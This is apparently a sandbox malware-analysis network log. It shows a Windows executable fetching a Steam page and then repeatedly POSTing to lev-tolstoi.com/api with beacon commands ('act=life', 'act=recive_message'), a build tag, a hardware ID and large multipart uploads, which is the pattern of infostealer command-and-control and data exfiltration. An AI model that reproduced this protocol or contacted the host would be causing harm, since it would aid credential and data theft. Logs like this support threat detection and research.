Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Wed, 18 Dec 2024 14:17:40 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=ab3f6d7c3e458d2fd2dcae42; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-18 14:17:41 UTC  14479  IN
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-18 14:17:41 UTC  10097  IN
Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-18 14:17:41 UTC  10545  IN
Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.6  49724        104.21.66.86    443               4176  C:\Users\user\Desktop\ji2xlo1f.exe

Timestamp                Bytes   Direction  Data
2024-12-18 14:17:43 UTC  262     OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-18 14:17:43 UTC  8       OUT        Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-18 14:17:45 UTC  1033    IN         HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 14:17:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=a5tj6vlj6ap2std8ulnnao732m; expires=Sun, 13-Apr-2025 08:04:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeCG9SH6xJjjpT9OxArZcQril4G9R9btnnKF7cgmKLebGasXH8UPAs38ubEfoGUtiBqyB90fL2gcO6EmVXFH%2FhLH%2Bb0hGO8dHTYt7b1x97XtBCfkxpRwz2PvYW7oe6aylyU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3fc72e29077ce2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1783&rtt_var=687&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1573275&cwnd=236&unsent_bytes=0&cid=2c80b653ff152f53&ts=2357&x=0"
2024-12-18 14:17:45 UTC  7       IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-18 14:17:45 UTC  5       IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.6  49739        104.21.66.86    443               4176  C:\Users\user\Desktop\ji2xlo1f.exe

Timestamp                Bytes   Direction  Data
2024-12-18 14:17:46 UTC  263     OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 50
Host: lev-tolstoi.com
2024-12-18 14:17:46 UTC  50      OUT        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=FATE99--november&j=
2024-12-18 14:17:47 UTC  1039    IN         HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 14:17:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=k8v9rs6s5ku9rrocavj1j879m9; expires=Sun, 13-Apr-2025 08:04:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ItKdity3DCxuXjNBHpnc2CECt9%2BYUAKzfqEWHwa662RDpqaIfTPCQCIsSWqC08Kzb%2FfABPoIcihnfihSTKjzi%2BzxF%2BiKtvW%2F6RBs39GAgNuq9v97vcC2dovTiwnlIpS2mSI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3fc7453b827d08-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1821&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=949&delivery_rate=1568206&cwnd=177&unsent_bytes=0&cid=092916f7fad4cb70&ts=1200&x=0"
2024-12-18 14:17:47 UTC  330     IN         Data: [chunked base64 body omitted]
2024-12-18 14:17:47 UTC  1369    IN         Data: [base64 body omitted]
2024-12-18 14:17:47 UTC  1369    IN         Data: [base64 body omitted]
2024-12-18 14:17:47 UTC  1369    IN         Data: [base64 body omitted]
2024-12-18 14:17:47 UTC  1369    IN         Data: [base64 body omitted]
2024-12-18 14:17:47 UTC  1369    IN         Data: [base64 body omitted]
2024-12-18 14:17:47 UTC  299     IN         Data: [base64 body omitted]
2024-12-18 14:17:47 UTC  1369    IN         Data: [chunked base64 body omitted]
                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC1369INData Raw: 48 2f 68 54 6e 65 77 57 49 6e 5a 52 37 39 4a 6a 50 4c 70 75 4a 4c 4f 62 4e 4a 42 55 76 36 31 4b 76 38 53 53 57 50 64 6b 6a 58 36 4c 61 41 4f 4b 4b 4d 33 6b 34 68 62 77 53 2f 4c 76 36 65 6b 31 59 41 39 31 51 77 41 34 2f 4e 78 30 46 46 47 48 64 7a 37 65 2b 56 73 37 6c 34 51 72 42 69 65 6e 6b 66 75 58 50 6d 79 72 71 76 45 68 69 47 5a 59 30 50 39 75 57 6d 6e 55 51 67 64 75 2b 64 31 76 53 69 6e 58 6e 33 2f 52 4d 76 4d 41 71 68 42 6a 4b 50 6e 73 35 4b 41 62 4d 30 51 44 71 79 68 61 62 46 52 53 56 37 78 70 7a 33 2b 4f 72 56 5a 47 35 45 7a 68 35 70 42 2b 52 4c 67 67 6f 4b 6d 31 4a 45 32 6b 6b 52 6d 7a 50 4e 6e 71 52 35 4f 42 64 72 31 63 37 30 54 2b 46 34 39 37 30 37 51 72 46 4c 78 48 39 6d 71 75 4f 66 33 67 53 2b 46 52 45 4f 73 2f 57 6e 76 55 56 59 4e 72 66 55 2f
                                                                                                                                                                                                                                        Data Ascii: H/hTnewWInZR79JjPLpuJLObNJBUv61Kv8SSWPdkjX6LaAOKKM3k4hbwS/Lv6ek1YA91QwA4/Nx0FFGHdz7e+Vs7l4QrBienkfuXPmyrqvEhiGZY0P9uWmnUQgdu+d1vSinXn3/RMvMAqhBjKPns5KAbM0QDqyhabFRSV7xpz3+OrVZG5Ezh5pB+RLggoKm1JE2kkRmzPNnqR5OBdr1c70T+F49707QrFLxH9mquOf3gS+FREOs/WnvUVYNrfU/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49747 | 104.21.66.86 | 443 | 4176 | C:\Users\user\Desktop\ji2xlo1f.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 14:17:49 UTC | 294 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=MVVVI5DJZ7NBBVVVVVVVVVVVVVVVVVV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12940
Host: lev-tolstoi.com
2024-12-18 14:17:49 UTC | 12940 | OUT | Data Raw: 2d 2d 4d 56 56 56 49 35 44 4a 5a 37 4e 42 42 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 36 30 37 39 42 38 34 36 45 31 34 42 37 32 32 32 31 42 30 46 43 44 30 35 36 41 34 34 35 34 0d 0a 2d 2d 4d 56 56 56 49 35 44 4a 5a 37 4e 42 42 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 56 56 56 49 35 44 4a 5a 37 4e 42 42 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a
Data Ascii: --MVVVI5DJZ7NBBVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"D66079B846E14B72221B0FCD056A4454--MVVVI5DJZ7NBBVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"2--MVVVI5DJZ7NBBVVVVVVVVVVVVVVVVVVContent-Disposition:
2024-12-18 14:17:54 UTC | 1039 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 14:17:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=a6cdrsp6e6hf65aabra3ql5eb5; expires=Sun, 13-Apr-2025 08:04:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IvcNnE%2FGmucUhpsGanhR4YwmG3ijfS4B5PTPnFrcL5uook9pabtT0zAR88Lmal0xmtsDTM2ZzkAAyvggzCgXtO8aSVsm0SJ%2F%2Bz6hf9KdQLapDmfd8RTW2Xred7uz08RRx4Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3fc75648884408-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2138&min_rtt=2138&rtt_var=803&sent=12&recv=17&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13892&delivery_rate=1361940&cwnd=201&unsent_bytes=0&cid=05b9cf8a5b7cf6bc&ts=4651&x=0"
2024-12-18 14:17:54 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 14:17:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49761 | 104.21.66.86 | 443 | 4176 | C:\Users\user\Desktop\ji2xlo1f.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 14:17:55 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=JG9YBKYFZRJ37RVVV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15102
Host: lev-tolstoi.com
2024-12-18 14:17:55 UTC | 15102 | OUT | Data Raw: 2d 2d 4a 47 39 59 42 4b 59 46 5a 52 4a 33 37 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 36 30 37 39 42 38 34 36 45 31 34 42 37 32 32 32 31 42 30 46 43 44 30 35 36 41 34 34 35 34 0d 0a 2d 2d 4a 47 39 59 42 4b 59 46 5a 52 4a 33 37 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 47 39 59 42 4b 59 46 5a 52 4a 33 37 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72
Data Ascii: --JG9YBKYFZRJ37RVVVContent-Disposition: form-data; name="hwid"D66079B846E14B72221B0FCD056A4454--JG9YBKYFZRJ37RVVVContent-Disposition: form-data; name="pid"2--JG9YBKYFZRJ37RVVVContent-Disposition: form-data; name="lid"FATE99--november
2024-12-18 14:17:58 UTC | 1044 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 14:17:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=34v27n209ardh0ul3dotf76266; expires=Sun, 13-Apr-2025 08:04:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GlkTL8GrtapFNT7ipW%2B4w8g97e0YwL2Z3mKXxBLvGDkcPXvdcHZZykukUvhgT%2FghVXyZ%2BhoMLCbU0bRAP%2Bk0%2FLm8%2BDOWzEh6IJcZvi0cem7d1y2mzsWVsE9IArPAKrFbdh0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3fc77b4aa08c96-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1829&rtt_var=695&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16040&delivery_rate=1563169&cwnd=188&unsent_bytes=0&cid=fb483a2fb9703cb3&ts=3019&x=0"
2024-12-18 14:17:58 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 14:17:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49771 | 104.21.66.86 | 443 | 4176 | C:\Users\user\Desktop\ji2xlo1f.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 14:17:59 UTC | 286 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KCMPRRNRVFVVVVVVVVVVVVV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 19996
Host: lev-tolstoi.com
2024-12-18 14:17:59 UTC | 15331 | OUT | Data Raw: 2d 2d 4b 43 4d 50 52 52 4e 52 56 46 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 36 30 37 39 42 38 34 36 45 31 34 42 37 32 32 32 31 42 30 46 43 44 30 35 36 41 34 34 35 34 0d 0a 2d 2d 4b 43 4d 50 52 52 4e 52 56 46 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 43 4d 50 52 52 4e 52 56 46 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a
Data Ascii: --KCMPRRNRVFVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"D66079B846E14B72221B0FCD056A4454--KCMPRRNRVFVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"3--KCMPRRNRVFVVVVVVVVVVVVVContent-Disposition: form-data; name="lid"
2024-12-18 14:17:59 UTC | 4665 | OUT | Data Raw: d7 8a f5 0f 24 a7 7a e5 f8 60 f2 e1 6d d1 73 d5 66 a5 31 16 55 bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c
Data Ascii: $z`msf1U2+?2+?2+?
2024-12-18 14:18:01 UTC | 1045 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 14:18:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7qfcma9hmrh6ukdo6fphhoctpm; expires=Sun, 13-Apr-2025 08:04:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pdRl6fLCQ428xzAtZShd9uokuA%2B5irh4C2OtUWpF61bLt0jijKsQ%2BCr%2FeqKu%2FpQim%2FnTCIatPmE22SX2vzr2TPdGpceCnlzFGiNIXJt9mmlmzb%2BnwfHaB43oEdfZulPD8zI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3fc797198742bf-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1613&rtt_var=605&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=20962&delivery_rate=1808049&cwnd=213&unsent_bytes=0&cid=852cf41124d819f2&ts=1963&x=0"
                                                                                                                                                                                                                                        2024-12-18 14:18:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                        2024-12-18 14:18:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49782 | 104.21.66.86 | 443 | 4176 | C:\Users\user\Desktop\ji2xlo1f.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 14:18:04 UTC | 291 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=J916AMKVVVNFNRVVVVVVVVVVVVVVV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1317
Host: lev-tolstoi.com
2024-12-18 14:18:04 UTC | 1317 | OUT | Data Raw: 2d 2d 4a 39 31 36 41 4d 4b 56 56 56 4e 46 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 36 30 37 39 42 38 34 36 45 31 34 42 37 32 32 32 31 42 30 46 43 44 30 35 36 41 34 34 35 34 0d 0a 2d 2d 4a 39 31 36 41 4d 4b 56 56 56 4e 46 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 39 31 36 41 4d 4b 56 56 56 4e 46 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d
Data Ascii: --J916AMKVVVNFNRVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"D66079B846E14B72221B0FCD056A4454--J916AMKVVVNFNRVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"1--J916AMKVVVNFNRVVVVVVVVVVVVVVVContent-Disposition: form-
2024-12-18 14:18:05 UTC | 1032 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 14:18:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gb4ujqjuk7b5drbb9ut34557a8; expires=Sun, 13-Apr-2025 08:04:44 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=twwckjBLobYkDLbK6fX2PVXUm8KiSy9PQ2o7XNEkgSSCPUdldImzOYOtNl1%2BwKJqXT3hLovHYXkLdbR1pFghCxijI1YdAmtI7bSN2unGLb9ggfhSnEvJEYUAtT4AVroXwZ4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3fc7b32cdc5e7a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1618&rtt_var=613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2244&delivery_rate=1776155&cwnd=214&unsent_bytes=0&cid=a1669067f01bd221&ts=1177&x=0"
2024-12-18 14:18:05 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 14:18:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49790 | 104.21.66.86 | 443 | 4176 | C:\Users\user\Desktop\ji2xlo1f.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 14:18:07 UTC | 295 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=CAJ77ABBJ773RVVVVVVVVVVVVVVVVVV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 594472
Host: lev-tolstoi.com
2024-12-18 14:18:07 UTC | 15331 | OUT | Data Raw: 2d 2d 43 41 4a 37 37 41 42 42 4a 37 37 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 36 30 37 39 42 38 34 36 45 31 34 42 37 32 32 32 31 42 30 46 43 44 30 35 36 41 34 34 35 34 0d 0a 2d 2d 43 41 4a 37 37 41 42 42 4a 37 37 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 41 4a 37 37 41 42 42 4a 37 37 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a
Data Ascii: --CAJ77ABBJ773RVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"D66079B846E14B72221B0FCD056A4454--CAJ77ABBJ773RVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"1--CAJ77ABBJ773RVVVVVVVVVVVVVVVVVVContent-Disposition:
2024-12-18 14:18:07 UTC | 15331 | OUT | Data Raw: 53 46 9d a2 67 74 3f 60 df 8e 99 f0 7d 5a ca 9a 64 20 eb 86 4f f7 f0 8b 93 c0 c5 16 96 5a c2 16 37 8d 96 0a 3b 3b 34 7b 37 3a f3 8a 2d e9 6c da 25 39 aa 7c c2 3a e7 0a aa 09 9e a1 6a 6f e3 57 c8 27 fc 77 8a dc 1e 4f 91 eb 1c 34 89 cf 50 3b 3b 18 8e dd 9b 0a 97 57 b8 ed 21 77 fb 66 ab d3 62 40 8d ec ef 08 77 b1 5c d5 07 0b 8c 9f 36 07 7f 4b be d3 f0 b1 30 8d 54 d0 7d 3a ba 81 08 1e 14 6f 5f b2 9d 8a d0 81 2b 3d 11 76 db 54 9e 58 82 84 66 ed 87 e2 49 11 87 e2 45 81 dc 18 94 5a 0b a7 9c 76 64 b8 4a 81 24 3b 42 01 7f 33 81 9a 89 cb 33 94 67 9c 4b ed dc d3 a1 3b da 8c 68 3f 93 cd 32 a9 93 80 7e 77 3f e0 34 cf d1 47 4f a2 b8 2f bc 7d fc da ba 67 cb 50 a2 fa ee e3 ae 02 a3 95 11 0b ff ed 63 5f e4 23 00 13 36 3f e3 26 60 48 60 c6 ee fe 0e 84 81 1a d4 ac 38 ab 61
Data Ascii: SFgt?`}Zd OZ7;;4{7:-l%9|:joW'wO4P;;W!wfb@w\6K0T}:o_+=vTXfIEZvdJ$;B33gK;h?2~w?4GO/}gPc_#6?&`H`8a
